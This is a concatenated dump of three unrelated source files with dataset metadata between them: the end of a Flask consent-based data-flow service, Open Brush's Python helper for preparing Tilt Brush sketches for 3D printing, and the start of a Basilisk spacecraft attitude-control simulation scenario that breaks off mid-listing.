Data Request for url in distribution_urls: req = requests.get(url, auth=SignedRequest(token=aud, sign_method=True, sign_path=True, key=our_key_full, protected=dumps(our_key["prot"]))) debug_log.info("Made data request and received following data from Source: \n{}" .format(dumps(loads(req.content), indent=2))) status = {"status": "ok", "service_mode": "Sink"} return status api.add_resource(Status, '/init') api.add_resource(DataFlow, '/dc') #api.add_resource(DataFlow, '/user/<string:user_id>/consentRecord/<string:cr_id>/resourceSet/<string:rs_id>') #"http://service_components:7000/api/1.2/sink_flow/user/95479a08-80cc-4359-ba28-b8ca23ff5572_53af88dc-33de-44be-bc30-e0826db9bd6c/consentRecord/cd431509-777a-4285-8211-95c5ac577537/resourceSet/http%3A%2F%2Fservice_components%3A7000%7C%7C9aebb487-0c83-4139-b12c-d7fcea93a3ad"
2.140625
2
Support/Python/tbdata/printing.py
twitchplayskh/open-brush
0
11082
# Copyright 2020 The Tilt Brush Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Helpers for 3d printing.""" import os import re import sys import math import pprint import shutil import itertools import subprocess from collections import Counter import numpy try: from tiltbrush.tilt import Tilt except ImportError: print("You need the Tilt Brush Toolkit (https://github.com/googlevr/tilt-brush-toolkit)") print("and then put its Python directory in your PYTHONPATH.") sys.exit(1) from tbdata.brush_lookup import BrushLookup # Convert strokes for 3d printing. # True Don't touch these strokes # False Remove these strokes from the sketch # <name> Replace the brush for these strokes # names can also be guids, which is useful when the name is ambiguous BRUSH_REPLACEMENTS = [ # Good brushes ('SquarePaper', True), ('ThickGeometry', True), ('Wire', True), # Brushes that should be replaced ('TaperedMarker', 'ThickGeometry'), ('OilPaint', 'ThickGeometry'), ('Ink', 'ThickGeometry'), ('Marker', 'ThickGeometry'), ('Paper', 'ThickGeometry'), ('FlatDeprecated','ThickGeometry'), # Questionable ('Highlighter', 'ThickGeometry'), ('Light', 'Wire'), # Remove particles ('Smoke', None), ('Snow', None), ('Embers', None), ('Stars', None), # Remove animated ('Fire', None), # Remove shader-based ('Plasma', None), ('Rainbow', None), ('Streamers', None), ] # ---------------------------------------------------------------------- # Little utilities # ---------------------------------------------------------------------- def msg(text): sys.stdout.write("%-79s\r" % text[:79]) sys.stdout.flush() def msgln(text): sys.stdout.write("%-79s\n" % text[:79]) sys.stdout.flush() def rgb8_to_hsl(rgb): """Takes a rgb8 tuple, returns a hsl tuple.""" HUE_MAX = 6 r = rgb[0] / 255.0 g = rgb[1] / 255.0 b = rgb[2] / 255.0 cmin = min(r, g, b) cmax = max(r, g, b) delta = cmax - cmin h = 0 s = 0 l = (cmax + cmin) if delta != 0: if l < 0.5: s = delta / l else: s = delta / (2 - l) if r == cmax: h = (g - b) / delta elif g == cmax: h = 2 + (b - r) / delta elif b == cmax: h = 4 + (r - g) / delta return h, s, l # ---------------------------------------------------------------------- # Brush conversion # ---------------------------------------------------------------------- def get_replacements_by_guid(replacements_by_name): """Returns a lookup table that is by-guid rather than by-name.""" brush_lookup = BrushLookup.get() def guid_or_name_to_guid(guid_or_name): if guid_or_name in brush_lookup.guid_to_name: return guid_or_name elif guid_or_name in brush_lookup.name_to_guids: return brush_lookup.get_unique_guid(guid_or_name) else: raise LookupError("Not a known brush or brush guid: %r" % guid_or_name) dct = {} for before, after in replacements_by_name: before_guid = guid_or_name_to_guid(before) if after is True: after_guid = before_guid elif after is None: after_guid = None else: after_guid = guid_or_name_to_guid(after) dct[before_guid] = after_guid return dct def convert_brushes(tilt, replacements_by_name, show_removed=False): """Convert brushes to 3d-printable versions, or remove their strokes from the tilt.""" replacements = get_replacements_by_guid(replacements_by_name) brush_lookup = BrushLookup.get() with tilt.mutable_metadata() as dct: index_to_guid = dct['BrushIndex'] # First, show us what brushes the tilt file uses used_guids = Counter() for stroke in tilt.sketch.strokes: guid = index_to_guid[stroke.brush_idx] used_guids[guid] += 1 print("Brushes used:") for guid, n in sorted(list(used_guids.items()), key=lambda p:-p[1]): print(" %5d %s" % (n, brush_lookup.guid_to_name.get(guid))) sys.stdout.flush() del used_guids index_to_new_index = {} for i, guid in enumerate(index_to_guid): name = brush_lookup.guid_to_name.get(guid, guid) try: new_guid = replacements[guid] except KeyError: print("%d: Don't know what to do with brush %s" % (i, name)) index_to_new_index[i] = i else: new_name = brush_lookup.guid_to_name.get(new_guid, new_guid) if new_guid is None: print("%d: Remove %s" % (i, name)) index_to_new_index[i] = None else: if guid == new_guid: print("%d: Keep %s" % (i, name)) elif name == new_name: print("%d: Replace %s/%s -> %s/%s" % (i, name, guid, new_name, new_guid)) else: print("%d: Replace %s -> %s" % (i, name, new_name)) try: new_idx = index_to_guid.index(new_guid) except ValueError: new_idx = len(index_to_guid) index_to_guid.append(new_guid) index_to_new_index[i] = new_idx brush_indices_to_remove = set(i for (i, new_i) in list(index_to_new_index.items()) if new_i is None) if brush_indices_to_remove: old_len = len(tilt.sketch.strokes) if show_removed: # Render in magenta instead of removing for stroke in tilt.sketch.strokes: if stroke.brush_idx in brush_indices_to_remove: stroke.brush_color = (1, 0, 1, 1) else: stroke.brush_color = stroke.brush_color else: tilt.sketch.strokes[:] = [s for s in tilt.sketch.strokes if s.brush_idx not in brush_indices_to_remove] new_len = len(tilt.sketch.strokes) print("Strokes %d -> %d" % (old_len, new_len)) for stroke in tilt.sketch.strokes: new_idx = index_to_new_index[stroke.brush_idx] # Might be none if it's a removed brush if new_idx is not None: stroke.brush_idx = new_idx # ---------------------------------------------------------------------- # Stroke simplification # ---------------------------------------------------------------------- def calculate_pos_error(cp0, cp1, middle_cps): if len(middle_cps) == 0: return 0 strip_length = cp1._dist - cp0._dist if strip_length <= 0: return 0 max_pos_error = 0 for i, cp in enumerate(middle_cps): t = (cp._dist - cp0._dist) / strip_length pos_interpolated = t * cp0._pos + (1-t) * cp1._pos pos_error = numpy.linalg.norm((pos_interpolated - cp._pos)) if pos_error > max_pos_error: max_pos_error = pos_error return max_pos_error def simplify_stroke(stroke, max_error): # Do greedy optimization of stroke. REQUIRED_END_CPS = 1 # or 2 keep_cps = [] toss_cps = [] # The current set of candidates to toss n = len(stroke.controlpoints) brush_size = stroke.brush_size for i, cp in enumerate(stroke.controlpoints): cp._pos = numpy.array(cp.position) if i == 0: cp._dist = 0 else: prev_cp = stroke.controlpoints[i-1] cp._dist = prev_cp._dist + numpy.linalg.norm(prev_cp._pos - cp._pos) if REQUIRED_END_CPS <= i < n - REQUIRED_END_CPS: pos_error = calculate_pos_error(keep_cps[-1], cp, toss_cps) keep = (pos_error > max_error * stroke.brush_size) #print " %3d: %s %f %f" % (i, keep, pos_error, stroke.brush_size * .2) else: keep = True #print " %3d: True (End)" % i if keep: keep_cps.append(cp) toss_cps = [] else: toss_cps.append(cp) stroke.controlpoints[:] = keep_cps def reduce_control_points(tilt, max_error): # If debug_simplify, the resulting .tilt file shows both the old and the new before_cp = 0 after_cp = 0 msg("Simplify strokes") pct = 0 n = len(tilt.sketch.strokes) for i, stroke in enumerate(tilt.sketch.strokes): new_pct = (i+1) * 100 / n if new_pct != pct: pct = new_pct removed_pct = (before_cp - after_cp) * 100 / (before_cp+1) msg("Simplify strokes: %3d%% %5d/%5d Removed %3d%%" % (pct, i, n, removed_pct)) before_cp += len(stroke.controlpoints) simplify_stroke(stroke, max_error) after_cp += len(stroke.controlpoints) msg("Simplify strokes: done") msgln("Control points: %5d -> %5d (%2d%%)" % ( before_cp, after_cp, after_cp * 100 / before_cp)) # ---------------------------------------------------------------------- # Stray strokes # ---------------------------------------------------------------------- def remove_stray_strokes(tilt, max_dist=0, replacement_brush_guid=None): """Show histograms of control point positions, to help with resizing.""" import numpy as np from math import sqrt def iter_pos(tilt): first_cp = 0 for stroke in tilt.sketch.strokes: stroke._first_cp = first_cp first_cp += len(stroke.controlpoints) for cp in stroke.controlpoints: yield cp.position positions = np.array(list(iter_pos(tilt))) if False: # Print out x/y/z histograms histograms = [np.histogram(positions[... , i], bins=30) for i in range(3)] for irow in range(len(histograms[0][0])+1): for axis, histogram in enumerate(histograms): try: print("%s %3d %6d " % ('xyz'[axis], histogram[1][irow], histogram[0][irow]), end=' ') except IndexError: print("%s %3d %6s " % ('xyz'[axis], histogram[1][irow], ''), end=' ') print() if max_dist > 0: # Convert replacement guid -> replacement index if replacement_brush_guid is None: replacement_brush_index = None else: with tilt.mutable_metadata() as dct: try: replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid) except ValueError: dct['BrushIndex'].append(replacement_brush_guid) replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid) # Compute Mahalanobis distance and remove strokes that fall outside # https://en.wikipedia.org/wiki/Mahalanobis_distance mean = np.mean(positions, axis=0) cov = np.cov(positions, rowvar=False) invcov = np.linalg.inv(cov) def mahalanobis_distance(v): """Return distance of row vector""" cv = (v - mean)[np.newaxis] return sqrt(cv.dot(invcov).dot(cv.T)[0, 0]) def out_of_bounds(stroke): i0 = stroke._first_cp i1 = i0 + len(stroke.controlpoints) dists = np.array(list(map(mahalanobis_distance, positions[i0 : i1]))) return np.any(dists > max_dist) msg("Finding OOB strokes") # TODO: figure out how to use np.einsum() and remove all the python-level loops oob_strokes = [ pair for pair in enumerate(tilt.sketch.strokes) if out_of_bounds(pair[1]) ] msg("") if len(oob_strokes): if replacement_brush_index is not None: for i, stroke in oob_strokes: print("Replacing out-of-bounds stroke", i) stroke.brush_idx = replacement_brush_index stroke.brush_color = (1,0,1,1) else: print("Removing %d strokes" % len(oob_strokes)) remove_indices = set(pair[0] for pair in oob_strokes) tilt.sketch.strokes[:] = [ stroke for i, stroke in enumerate(tilt.sketch.stroke) if i not in remove_indices ] # ---------------------------------------------------------------------- # Color reduction # ---------------------------------------------------------------------- def get_most_similar_factors(n): """Factorize n into two numbers. Returns the best pair, in the sense that the numbers are the closest to each other.""" i = int(n**0.5 + 0.5) while n % i != 0: i -= 1 return i, n/i def get_good_factors(n, max_aspect_ratio=None): """Factorize n into two integers that are closest to each other. If max_aspect_ratio is passed, search numbers >= n until a pair is found whose aspect ratio is <= max_aspect_ratio.""" if max_aspect_ratio is None: return get_most_similar_factors(n) for i in itertools.count(): a, b = get_most_similar_factors(n + i) if float(b)/a <= max_aspect_ratio: return a, b def rgbaf_to_rgb8(rgbaf): """Convert [r, g, b, a] floats to (r, g, b) bytes.""" return tuple(int(channel * 255) for channel in rgbaf[0:3]) def rgb8_to_rgbaf(rgb8): """Convert (r, g, b) bytes to [r, g, b, a] floats.""" lst = [channel / 255.0 for channel in rgb8] lst.append(1.0) return lst def tilt_colors_to_image(tilt, max_aspect_ratio=None, preserve_colors=()): """Returns a PIL.Image containing the colors used in the tilt. The image will have colors in roughly the same proportion as the control points in the tilt. preserve_colors is a list of rgb8 colors.""" import numpy as np from PIL import Image assert max_aspect_ratio is None or max_aspect_ratio > 0 preserve_colors = set(preserve_colors) def iter_rgb8_colors(tilt): for stroke in tilt.sketch.strokes: yield (rgbaf_to_rgb8(stroke.brush_color), len(stroke.controlpoints)) def by_decreasing_usage(counter_pair): # Sort function for colors return -counter_pair[1] def by_color_similarity(counter_pair): # Sort function for colors rgb8, usage = counter_pair h, s, l = rgb8_to_hsl(rgb8) return (rgb8 in preserve_colors), l counter = Counter() for color, n in iter_rgb8_colors(tilt): counter[color] += n most_used_color, amt = max(iter(counter.items()), key=lambda pair: pair[1]) for rgb8 in preserve_colors: if rgb8 not in counter: print("Ignoring: #%02x%02x%02x is not in the image" % rgb8) else: counter[rgb8] += amt / 2 # Find a "nice" width and height, possibly adjusting the number of texels num_texels = sum(counter.values()) width, height = get_good_factors(num_texels, max_aspect_ratio) if width * height != num_texels: counter[most_used_color] += width * height - num_texels assert counter[most_used_color] > 0 num_texels = sum(counter.values()) assert width * height == num_texels # Expand the colors into a 1d array, then turn into an Image colors_array = np.zeros(shape=(num_texels, 3), dtype='uint8') i = 0 # The sort used here only matters to humans when they look at the images colors_and_counts = sorted(iter(counter.items()), key=by_color_similarity) # colors_and_counts = sorted(counter.iteritems(), key=by_decreasing_usage) for (color, count) in colors_and_counts: colors_array[i:i+count] = color i += count colors_array.shape = (height, width, 3) return Image.fromarray(colors_array, mode='RGB') def get_quantized_image_pillow(im, num_colors): MAXIMUM_COVERAGE = 1 print("Falling back to old color quantization") return im.quantize(colors=num_colors, method=MAXIMUM_COVERAGE), 'pillow' def get_quantized_image_pngquant(im, num_colors): from PIL import Image import subprocess # pngquant errors out if its best solution is below this "quality" QUALITY_MIN = 0 # never error out # pngquant stops using colors when "quality" goes above this. # I have no real feeling for what this number means in practice QUALITY_MAX = 40 im.save('tmp_pngquant.png') try: subprocess.check_call([ 'pngquant', '--nofs', # no dithering '--force', '--quality', '%d-%d' % (QUALITY_MIN, QUALITY_MAX), '-o', 'tmp_pngquant_out.png', str(num_colors), '--', 'tmp_pngquant.png' ]) imq = Image.open('tmp_pngquant_out.png') imq.load() finally: if os.path.exists('tmp_pngquant.png'): os.unlink('tmp_pngquant.png') if os.path.exists('tmp_pngquant_out.png'): os.unlink('tmp_pngquant_out.png') return imq, 'pngquant' def get_quantized_image(im, num_colors): try: return get_quantized_image_pngquant(im, num_colors) except subprocess.CalledProcessError as e: print("Error running pngquant: %s" % e) except OSError as e: print("Missing pngquant: %s" % e) print("Download pngquant.exe it and put it in your PATH.") return get_quantized_image_pillow(im, num_colors) def simplify_colors(tilt, num_colors, preserve_colors): im = tilt_colors_to_image(tilt, max_aspect_ratio=4, preserve_colors=preserve_colors) if num_colors < 0: # Little hack to force use of pillow imq, method = get_quantized_image_pillow(im, -num_colors) else: imq, method = get_quantized_image(im, num_colors) def iter_rgb8(im): return zip(im.getdata(0), im.getdata(1), im.getdata(2)) def get_imq_color(ipixel, data=imq.getdata(), palette=imq.getpalette()): # Look up color in imq, which is awkward because it's palettized palette_entry = data[ipixel] r, g, b = palette[palette_entry * 3 : (palette_entry + 1) * 3] return (r, g, b) # Create table mapping unquantized rgb8 to quantized rgbaf old_to_new = {} idx = 0 for (old_color, group) in itertools.groupby(iter_rgb8(im)): assert old_color not in old_to_new old_to_new[old_color] = rgb8_to_rgbaf(get_imq_color(idx)) idx += len(list(group)) for stroke in tilt.sketch.strokes: stroke.brush_color = old_to_new[rgbaf_to_rgb8(stroke.brush_color)] if True: import numpy as np for old8, newf in old_to_new.items(): oldv = np.array(rgb8_to_rgbaf(old8)[0:3]) newv = np.array(newf[0:3]) err = oldv - newv err = math.sqrt(np.dot(err, err)) if err > .2: print("High color error: #%02x%02x%02x" % old8) num_colors = len(set(map(tuple, list(old_to_new.values())))) base, _ = os.path.splitext(tilt.filename) im.save('%s_%s.png' % (base, 'orig')) imq.save('%s_%s_%d.png' % (base, method, num_colors)) # ---------------------------------------------------------------------- # Split export into multiple .obj files # ---------------------------------------------------------------------- def iter_aggregated_by_color(json_filename): """Yields TiltBrushMesh instances, each of a uniform color.""" from tiltbrush.export import iter_meshes, TiltBrushMesh def by_color(m): return m.c[0] meshes = iter_meshes(json_filename) for (color, group) in itertools.groupby(sorted(meshes, key=by_color), key=by_color): yield TiltBrushMesh.from_meshes(group) def write_simple_obj(mesh, outf_name): from io import StringIO tmpf = StringIO() for v in mesh.v: tmpf.write("v %f %f %f\n" % v) for (t1, t2, t3) in mesh.tri: t1 += 1; t2 += 1; t3 += 1 tmpf.write("f %d %d %d\n" % (t1, t2, t3)) with file(outf_name, 'wb') as outf: outf.write(tmpf.getvalue()) def split_json_into_obj(json_filename): import struct output_base = os.path.splitext(json_filename)[0].replace('_out', '') meshes = list(iter_aggregated_by_color(json_filename)) meshes.sort(key=lambda m: len(m.v), reverse=True) for i, mesh in enumerate(meshes): # It's the "ignore normals" that does the most collapsing here. mesh.collapse_verts(ignore=('uv0', 'uv1', 'c', 't', 'n')) mesh.remove_degenerate() (r, g, b, a) = struct.unpack('4B', struct.pack('I', mesh.c[0])) assert a == 255, (r, g, b, a) hex_color = '%02x%02x%02x' % (r, g, b) outf_name = '%s %02d %s.obj' % (output_base, i, hex_color) write_simple_obj(mesh, outf_name) msgln("Wrote %s" % outf_name) # ---------------------------------------------------------------------- # Main # ---------------------------------------------------------------------- def process_tilt(filename, args): msg("Load tilt") tilt = Tilt(filename) msg("Load strokes") tilt.sketch.strokes msg("") if args.debug: msg("Clone strokes") before_strokes = [s.clone() for s in tilt.sketch.strokes] # Do this before color quantization, because it removes strokes (and their colors) if args.convert_brushes: convert_brushes(tilt, BRUSH_REPLACEMENTS) if args.remove_stray_strokes is not None: remove_stray_strokes(tilt, args.remove_stray_strokes, BrushLookup.get().get_unique_guid('Wire')) if args.pos_error_tolerance > 0: reduce_control_points(tilt, args.pos_error_tolerance) if args.simplify_colors is not None: simplify_colors(tilt, num_colors=args.simplify_colors, preserve_colors=args.preserve_colors) if args.debug: final_strokes = [] # interleave them so it renders semi-nicely... for before, after in itertools.zip_longest(before_strokes, tilt.sketch.strokes): if before is not None: for cp in before.controlpoints: cp.position[1] += 10 final_strokes.append(before) if after is not None: final_strokes.append(after) tilt.sketch.strokes[:] = final_strokes tilt.write_sketch() msgln("Wrote %s" % os.path.basename(tilt.filename)) def main(): import argparse parser = argparse.ArgumentParser(usage='''%(prog)s [ files ] Process .tilt files to get them ready for 3D printing. You should generally do the steps in this order: 1. Use --remove-stray-strokes (which actually just colors them magenta). Manually delete the strokes you don't want to keep. 2. Experiment with different values for --simplify-colors. Use --preserve-color option to force a color to remain present. 3. Use --convert-brushes and --pos-error-tolerance. 4. Load .tilt files in Tilt Brush, and export to .json 5. Convert from .json -> multiple .obj files ''') def hex_color(arg): arg = arg.lower() m = re.match(r'^#?([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})$', arg) if m is not None: return tuple(int(m.group(i), 16) for i in (1, 2, 3)) else: raise argparse.ArgumentTypeError("Must be exactly hex 6 digits: %r" % arg) parser.add_argument( '--debug', action='store_true', help='For debugging: put both the original and modified strokes in the resulting .tilt file') parser.add_argument( '--remove-stray-strokes', metavar='float', type=float, default=None, help="Replace strokes that are far away from the sketch with magenta wire. Argument is the number of standard deviations; 5.0 is a reasonable starting point.") parser.add_argument( '--simplify-colors', type=int, metavar='N', help='Simplify down to N colors. Use a negative number to try the alternate algorithm.') parser.add_argument( '--preserve-color', dest='preserve_colors', type=hex_color, action='append', default=[], help='Color to preserve, as a hex string like #ff00ff') parser.add_argument( '--convert-brushes', action='store_true', help='Convert brushes to 3d-printable ones') parser.add_argument( '--pos-error-tolerance', type=float, default=0, help='Allowable positional error when simplifying strokes, as a fraction of stroke width. If 0, do not simplify. .1 to .3 are good values. (default %(default)s)') parser.add_argument('-o', dest='output_file', help='Name of output file (optional)') parser.add_argument('files', type=str, nargs='+', help='File(s) to hack') args = parser.parse_args() for i, orig_filename in enumerate(args.files): if orig_filename.endswith('.tilt'): base, ext = os.path.splitext(orig_filename) if i == 0 and args.output_file is not None: working_filename = args.output_file else: working_filename = base + '_out' + ext shutil.copyfile(orig_filename, working_filename) process_tilt(working_filename, args) elif orig_filename.endswith('.json'): split_json_into_obj(orig_filename) if __name__=='__main__': main()
1.929688
2
src/tests/scenarios/Maxwell_Main.py
ian-cooke/basilisk_mag
0
11083
<reponame>ian-cooke/basilisk_mag<gh_stars>0 ''' ''' ''' ISC License Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ''' # # Basilisk Scenario Script and Integrated Test # # Purpose: Integrated test of the spacecraftPlus(), extForceTorque, simpleNav() and # MRP_Feedback() modules. Illustrates a 6-DOV spacecraft detumbling in orbit. # This scenario is the same as scenarioAttitudeControl, but with the # difference that here the control and dynamics are executed at different # frequencies or time steps. # Author: <NAME> # Creation Date: Nov. 25, 2016 # import pytest import os import numpy as np import matplotlib.pyplot as plt from datetime import datetime from Basilisk import __path__ # import general simulation support files from Basilisk.utilities import SimulationBaseClass from Basilisk.utilities import unitTestSupport # general support file with common unit test functions from Basilisk.utilities import simIncludeGravBody from Basilisk.utilities import macros from Basilisk.utilities import orbitalMotion from Basilisk.utilities import simIncludeRW from Basilisk.utilities import fswSetupRW # import simulation related support from Basilisk.simulation import spacecraftPlus from Basilisk.simulation import extForceTorque from Basilisk.simulation import simMessages from Basilisk.simulation import sim_model from Basilisk.simulation import simple_nav from Basilisk.simulation import mag_meter from Basilisk.simulation import imu_sensor from Basilisk.simulation import coarse_sun_sensor from Basilisk.simulation import reactionWheelStateEffector from Basilisk.simulation import rwVoltageInterface from Basilisk.simulation import torqueRodDynamicEffector # import FSW Algorithm related support from Basilisk.fswAlgorithms import B_DOT from Basilisk.fswAlgorithms import inertial3D from Basilisk.fswAlgorithms import attTrackingError from Basilisk.fswAlgorithms import rwMotorVoltage from Basilisk.fswAlgorithms import rwMotorTorque from Basilisk.fswAlgorithms import maxwellLS from Basilisk.fswAlgorithms import QUAT_PD from Basilisk.fswAlgorithms import sunSafePoint # import message declarations from Basilisk.fswAlgorithms import fswMessages bskPath = __path__[0] from Basilisk import pyswice def run(show_plots, detumble, saturate, sunpoint, useUnmodeledTorque, useJitterSimple, useRWVoltageIO): '''Call this routine directly to run the tutorial scenario.''' # Create simulation variable names dynTaskName = "dynTask" dynProcessName = "dynProcess" fswTaskName = "fswTask" fswProcessName = "fswProcess" # Create a sim module as an empty container scSim = SimulationBaseClass.SimBaseClass() scSim.TotalSim.terminateSimulation() # set the simulation time variable used later on simulationTime = macros.min2nano(2) # # create the simulation process # dynProcess = scSim.CreateNewProcess(dynProcessName) fswProcess = scSim.CreateNewProcess(fswProcessName) # Process message interfaces. # this step is used to copy messages between the dyn and fsw processes # as long as the message has the same name, it will get copied over automatically dyn2FSWInterface = sim_model.SysInterface() fsw2DynInterface = sim_model.SysInterface() dyn2FSWInterface.addNewInterface(dynProcessName, fswProcessName) fsw2DynInterface.addNewInterface(fswProcessName, dynProcessName) fswProcess.addInterfaceRef(dyn2FSWInterface) dynProcess.addInterfaceRef(fsw2DynInterface) # create the dynamics task and specify the integration update time simTimeStep = macros.sec2nano(0.1) dynProcess.addTask(scSim.CreateNewTask(dynTaskName, simTimeStep)) fswTimeStep = macros.sec2nano(0.1) fswProcess.addTask(scSim.CreateNewTask(fswTaskName, fswTimeStep)) # if this scenario is to interface with the BSK Viz, uncomment the following lines # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only support 'earth', 'mars', or 'sun' # # setup the simulation tasks/objects # # initialize spacecraftPlus object and set properties scObject = spacecraftPlus.SpacecraftPlus() scObject.ModelTag = "spacecraftBody" # define the simulation inertia I = [0.0511, 0., 0., 0., 0.1522, 0., 0., 0., 0.1179] scObject.hub.mHub = 10.0 # kg - spacecraft mass scObject.hub.r_BcB_B = [[0.0], [0.0], [0.0]] # m - position vector of body-fixed point B relative to CM scObject.hub.IHubPntBc_B = unitTestSupport.np2EigenMatrix3d(I) # add spacecraftPlus object to the simulation process scSim.AddModelToTask(dynTaskName, scObject) # clear prior gravitational body and SPICE setup definitions gravFactory = simIncludeGravBody.gravBodyFactory() gravBodies = gravFactory.createBodies(['earth','sun','moon']) # setup Earth Gravity Body earth = gravBodies['earth'] earth.isCentralBody = True # ensure this is the central gravitational body mu = earth.mu simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM03S.txt' , earth.spherHarm , 100) # attach gravity model to spaceCraftPlus scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) # setup simulation start data/time timeInitString = "2020 March 1 00:28:30.0" spiceTimeStringFormat = '%Y %B %d %H:%M:%S.%f' timeInit = datetime.strptime(timeInitString, spiceTimeStringFormat) # setup SPICE module gravFactory.createSpiceInterface(bskPath + '/supportData/EphemerisData/', timeInitString) gravFactory.spiceObject.zeroBase = 'Earth' # add SPICE interface to task list scSim.AddModelToTask(dynTaskName, gravFactory.spiceObject, None, -1) # attach gravity model to spaceCraftPlus scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) # # set initial Spacecraft States # # setup the orbit using classical orbit elements oe = orbitalMotion.ClassicElements() orbitRadius = 550.0 oe.a = (6371.0 + orbitRadius) * 1000.0 # meters oe.e = 0.0001 oe.i = 45 * macros.D2R oe.Omega = 0.0 * macros.D2R oe.omega = 0.0 * macros.D2R oe.f = 180.0 * macros.D2R rN, vN = orbitalMotion.elem2rv(mu, oe) scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_CN_N scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_CN_N scObject.hub.sigma_BNInit = [[0.1], [0.2], [-0.3]] # sigma_BN_B if detumble: scObject.hub.omega_BN_BInit = [[13*macros.D2R], [13*macros.D2R], [13*macros.D2R]] # rad/s - omega_BN_B if sunpoint: scObject.hub.omega_BN_BInit = [[0.001*macros.D2R], [0.001*macros.D2R], [0.001*macros.D2R]] # rad/s - omega_BN_B if saturate or sunpoint: # # Add RW devices # rwFactory = simIncludeRW.rwFactory() # store the RW dynamical model type varRWModel = rwFactory.BalancedWheels if useJitterSimple: varRWModel = rwFactory.JitterSimple # create each RW by specifying the RW type, the spin axis gsHat, plus optional arguments RW1 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM , RWModel=varRWModel, ) RW2 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, 0.906307787036650], maxMomentum=0.02, Omega=0. # RPM , RWModel=varRWModel, ) RW3 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, -0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM , RWModel=varRWModel, ) RW4 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, -0.906307787036650], maxMomentum=0.02, Omega=0. , RWModel=varRWModel, ) numRW = rwFactory.getNumOfDevices() # create RW object container and tie to spacecraft object rwStateEffector = reactionWheelStateEffector.ReactionWheelStateEffector() rwStateEffector.InputCmds = "reactionwheel_cmds" rwFactory.addToSpacecraft("ReactionWheels", rwStateEffector, scObject) # add RW object array to the simulation process scSim.AddModelToTask(dynTaskName, rwStateEffector, None, 2) if useRWVoltageIO: rwVoltageIO = rwVoltageInterface.RWVoltageInterface() rwVoltageIO.ModelTag = "rwVoltageInterface" # set module parameters(s) rwVoltageIO.setGains(np.array([0.2 / 10.] * 3)) # [Nm/V] conversion gain # Add test module to runtime call list scSim.AddModelToTask(dynTaskName, rwVoltageIO) # add the simple Navigation sensor module. This sets the SC attitude, rate, position # velocity navigation message sNavObject = simple_nav.SimpleNav() sNavObject.ModelTag = "SimpleNavigation" scSim.AddModelToTask(dynTaskName, sNavObject) # # setup sensors # # Add IMU Sensor ImuSensor = imu_sensor.ImuSensor() ImuSensor.ModelTag = "imusensor" r_SB_B = np.array([0.0, 0.0, 0.0]) # Sensor position wrt body frame origin ImuSensor.sensorPos_B = np.array(r_SB_B) # IMU Parameters accelLSBIn = 0.0 # Not Used gyroLSBIn = 0.0001 # Discretization value (least significant bit) senRotBiasIn = 0.0 # Rotational sensor bias senRotMaxIn = 50.0 # Gyro saturation value gyroScale = [1., 1., 1.] # Scale factor for each axis errorBoundsGryo = [0] * 3 # Bounds random walk gyroNoise = 0.000 # Noise ImuSensor.setLSBs(accelLSBIn, gyroLSBIn) ImuSensor.senRotBias = np.array([senRotBiasIn] * 3) ImuSensor.senRotMax = senRotMaxIn ImuSensor.gyroScale = np.array(gyroScale) ImuSensor.PMatrixGyro = np.eye(3) * gyroNoise ImuSensor.walkBoundsGyro = np.array(errorBoundsGryo) # add IMU to Simulation Process scSim.AddModelToTask(dynTaskName, ImuSensor) # Add Mag Meter MagMeter = mag_meter.MagMeter() MagMeter.ModelTag = "MagMeter" MagMeterNoise = 0.00000 MagMeterBias = 0.0000 ImuSensor.senRotBias = np.array([MagMeterBias] * 3) MagMeter.PMatrix = np.eye(3) * MagMeterNoise MagMeter.inclination = oe.i MagMeter.orbitRadius = oe.a / 1000 # 6371.0 + orbitRadius scSim.AddModelToTask(dynTaskName, MagMeter) # # Add Coarse Sun Sensors cssConstellation = coarse_sun_sensor.CSSConstellation() CSSOrientationList = [ [0.866, 0.000, -0.500], # 1 - 13 G [0.866, -0.433, 0.250], # 2 - 14 G [0.866, 0.433, 0.250], # 3 - 12 G [0.500, 0.866, 0.000], # 4 - 10 G [0.500, -0.866, 0.000], # 5 - 7 G [0.000, -0.866, -0.500], # 6 - 9 G [0.500, 0.866, 0.000], # 7 - 5 G [0.000, 0.866, -0.500], # 8 - 11 G [0.000, 0.866, 0.500], # 9 - 6 G [0.500, -0.866, 0.000], # 10 - 4 G [0.000, -0.866, 0.500], # 11 - 8 G [0.866, -0.433, -0.250], # 12 - 3 G [0.866, 0.000, 0.500], # 13 - 1 G [0.866, 